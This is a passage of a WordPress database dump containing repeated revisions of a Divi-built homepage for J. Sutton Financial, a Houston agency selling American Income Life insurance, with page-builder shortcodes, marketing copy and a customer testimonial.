src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 18:37:26','2023-03-26 18:37:26','',138,'http://cmdev-site1.com/?p=491',0,'revision','',0),(494,1,'2023-03-26 18:39:15','2023-03-26 18:39:15','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||376px|||\" global_colors_info=\"{}\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_fullwidth_menu][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 18:39:15','2023-03-26 18:39:15','',138,'http://cmdev-site1.com/?p=494',0,'revision','',0),(493,1,'2023-03-26 18:38:58','2023-03-26 18:38:58','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||376px|||\" global_colors_info=\"{}\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_fullwidth_menu][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 18:38:58','2023-03-26 18:38:58','',138,'http://cmdev-site1.com/?p=493',0,'revision','',0),(497,1,'2023-03-26 18:56:50','2023-03-26 18:56:50','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||364px|||\" global_colors_info=\"{}\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_fullwidth_menu][et_pb_fullwidth_code _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" width=\"75%\" max_width=\"75%\" module_alignment=\"center\" global_colors_info=\"{}\"]<h1 style=\"color: #fff\"><!-- [et_pb_line_break_holder] -->J. Sutton Financial, an Independent Agency for American Income Life Insurance Company  <!-- [et_pb_line_break_holder] --></h1><!-- [et_pb_line_break_holder] --><p style=\"color: #fff\"><!-- [et_pb_line_break_holder] -->  J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.<!-- [et_pb_line_break_holder] --></p>[/et_pb_fullwidth_code][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"23px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"City of Houston Skyline July 4th 2018 with dramatic sunset\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][dsm_button button_one_text=\"Work for Us\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto|27px|auto||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] 